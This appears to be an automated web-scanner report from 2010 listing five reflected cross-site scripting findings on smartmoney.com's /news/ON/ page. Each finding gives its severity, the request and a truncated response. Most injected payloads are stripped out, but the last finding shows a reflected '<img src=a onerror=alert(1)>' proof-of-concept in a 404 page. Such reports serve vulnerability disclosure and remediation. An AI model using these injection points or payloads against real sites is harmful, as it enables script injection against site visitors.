1. Cross-site scripting (reflected)
1.1. http://www.smartmoney.com/news/ON/ [name of an arbitrarily supplied request parameter]
1.2. http://www.smartmoney.com/news/ON/ [name of an arbitrarily supplied request parameter]
1.3. http://www.smartmoney.com/news/ON/ [story parameter]
1.4. http://www.smartmoney.com/news/ON/ [story parameter]
1.5. http://www.smartmoney.com/news/ON/ [story parameter]
Severity: | High |
Confidence: | Firm |
Host: | http://www.smartmoney.com |
Path: | /news/ON/ |
GET /news/ON/?story=ON Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Wed, 24 Nov 2010 01:50:06 GMT Server: Microsoft-IIS/6.0 Set-Cookie: NEWSMIUSER=D3BBDECE Set-Cookie: REFRESH=;domain= Set-Cookie: REFRESH=;domain= Set-Cookie: ISFINADVISE=%2D1;domain= Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: NSC_tnz-xxx-iuuq <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <a href="/news/ON/?story=ON ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.smartmoney.com |
Path: | /news/ON/ |
GET /news/ON/?story=ON Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Wed, 24 Nov 2010 01:50:18 GMT Server: Microsoft-IIS/6.0 Set-Cookie: NEWSMIUSER=D3BA8C7A Set-Cookie: REFRESH=;domain= Set-Cookie: REFRESH=;domain= Set-Cookie: ISFINADVISE=%2D1;domain= Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: NSC_tnz-xxx-iuuq <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <script language="JavaScript"> function openPrintWindow(){ popupWin = window.open('/news/ON/ </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.smartmoney.com |
Path: | /news/ON/ |
GET /news/ON/?story=ON Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Wed, 24 Nov 2010 01:49:33 GMT Server: Microsoft-IIS/6.0 Set-Cookie: NEWSMIUSER=D3B6C8EB Set-Cookie: REFRESH=;domain= Set-Cookie: REFRESH=;domain= Set-Cookie: ISFINADVISE=%2D1;domain= Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: NSC_tnz-xxx-iuuq <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <link rel="canonical" href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.smartmoney.com |
Path: | /news/ON/ |
GET /news/ON/?story=ON Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Wed, 24 Nov 2010 01:49:40 GMT Server: Microsoft-IIS/6.0 Set-Cookie: NEWSMIUSER=D3B48B42 Set-Cookie: REFRESH=;domain= Set-Cookie: REFRESH=;domain= Set-Cookie: ISFINADVISE=%2D1;domain= Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: NSC_tnz-xxx-iuuq <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <script language="JavaScript"> function openPrintWindow(){ popupWin = window.open('/news/ON/ </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.smartmoney.com |
Path: | /news/ON/ |
GET /news/ON/?story=ON Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Connection: close Date: Wed, 24 Nov 2010 01:50:03 GMT Server: Microsoft-IIS/6.0 Set-Cookie: NEWSMIUSER=D3BB3E8A Set-Cookie: REFRESH=;domain= Set-Cookie: REFRESH=;domain= Set-Cookie: ISFINADVISE=%2D1;domain= Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: NSC_tnz-xxx-iuuq <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <!-- *Content Not Found*: ON-20101123-000061a07a4--><img src=a onerror=alert(1) ...[SNIP]... |